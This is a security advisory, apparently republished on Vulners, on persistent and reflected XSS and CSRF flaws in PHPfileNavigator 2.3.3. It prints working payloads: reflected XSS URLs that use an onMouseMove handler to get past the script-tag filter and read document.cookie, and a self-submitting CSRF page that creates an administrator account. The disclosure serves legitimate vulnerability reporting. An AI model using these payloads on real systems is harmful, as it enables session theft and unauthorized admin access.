Vulners
Lucene search
PHPfileNavigator 2.3.3 XSS / CSRF Vulnerabilities
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812c.txt
Vendor:
================================
pfn.sourceforge.net
Product:
===================================
PHPfileNavigator v2.3.3 (pfn)
Is state-of-the-art, open source web based application
to complete manage your files and folders.
Vulnerability Type:
=========================
Persistent & Reflected XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple persistent XSS vulnerable fields exist on the 'Modify User' form.
nome, usuario, email etc...
We can leverage existing CSRF vulnerability to update a victimz profile and
store malicious
XSS payload or an malicious user can inject there own payloads when
updating thier profilez
affecting other users and the security of the whole application.
Multiple reflected XSS exists as well for following PHP pages all with same
vulnerable
parameter 'dir' when issuing GET requests.
pfn-2.3.3 application seems to filter out <script> tags etc, but we can
bypass this using
<DIV onMouseMove= JS functions!.
navega.php
accion.php
preferencias.php
Tested using xampp-1.7.0
Exploit code(s):
===============
Persistent XSS:
---------------
POST URL:
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/index.php?PHPSESSID=
e.g.
Inject <script>alert(666)</script> into the 'Name*', 'User*' or 'Email'
field
and click Accept button.
Injecting XSS into 'name' field will store the XSS payload in the pfn MySQL
database
in 'pfn_usuarios' table called 'nome' in the 'nome' column. The Same fate
will happen for
other injected fields 'email & 'usuario'.
Reflected XSS:
--------------
1)
http://localhost/PHPfileNavigator/pfn-2.3.3/navega.php?PHPSESSID=HELL&dir=
" <DIV onMouseMove= "alert(document.cookie) " </a>
2)
http://localhost/PHPfileNavigator/pfn-2.3.3/accion.php?accion=buscador&PHPSESSID=HELL&dir=
" <DIV onMouseMove= "alert(document.cookie) " </a>
3)
http://localhost/PHPfileNavigator/pfn-2.3.3/preferencias.php?PHPSESSID=HELL&dir=
" <DIV onMouseMove= "alert(document.cookie) " </a>
Disclosure Timeline:
=========================================================
Vendor Notification: August 8, 2015
August 12, 2015 : Public Disclosure
Severity Level:
=========================================================
Medium
Description:
==========================================================
Request Method(s): [+] POST / GET
Vulnerable Product: [+] PHPfileNavigator v2.3.3 (pfn)
Vulnerable Parameter(s): [+] nome, usuario, email, dir
Affected Area(s): [+] Admin
Vulnerability Details:
=====================
No CSRF token exists when creating user accounts, this allows
us to exploit the application and add arbitrary users The
?PHPSESSID= cookie used in URL is useless as we can just replace
the value with whatever.
e.g.
?PHPSESSID='inthesignofevil'
or just omit it all together makes no difference exploit will
still succeed. Next create our form POST and a self calling
Javascript function, then get a logged in user to click our
malicious linx or visit our webpage where they will be PWN3D.
Tested using xampp-1.7.0
Exploit code(s):
===============
<!DOCTYPE>
<html>
<!-- CSRF exploit add arbitrary user accounts with Admin privs -->
<form id="USERIOS_EVILOS" action="
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/gdar.php?PHPSESSID=inthesignofevil"
method="post">
<input type="hidden" name="id_usuario" value="" />
<input type="text" id="nome" name="nome" value="hyp3rlinx" class="text"
tabindex="10" />
<input type="text" id="usuario" name="usuario" value="hyp3rlinx"
class="text" tabindex="20" />
<input type="password" id="contrasinal" name="contrasinal"
value="abc123" class="text" tabindex="30" />
<input type="password" id="rep_contrasinal" name="rep_contrasinal"
value="abc123" class="text" tabindex="40" />
<input type="text" id="email" name="email" value="[email protected]"
class="text" tabindex="50" />
<input type="text" id="max_descargas" name="max_descargas" value="0"
class="text" tabindex="60" />
<input type="text" id="actual_descargas" name="actual_descargas"
value="0" class="text" tabindex="70" />
<select id="cambiar_datos" name="cambiar_datos" tabindex="75">
<option value="1" >ON</option>
<option value="0" selected="selected">OFF</option>
</select>
<select id="id_grupo" name="id_grupo" tabindex="80">
<option value="0" selected="selected">Administrators</option>
</select>
<select id="admin" name="admin" tabindex="90">
<option value="1" selected="selected">ON</option>
<option value="0" >OFF</option>
</select>
<select id="estado" name="estado" tabindex="100">
<option value="1" selected="selected">ON</option>
<option value="0" >OFF</option>
</select>
<input type="checkbox" id="Fraices_1" name="Fraices[]" value="1"
class="checkbox" />
</form>
<script>
(function PWN3D(){
var e=document.getElementById('USERIOS_EVILOS')
e.submit()
})()
</script>
</body>
</html>
# 0day.today [2018-03-20] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Aug 2015 00:00Current
6.9Medium risk
Vulners AI Score6.9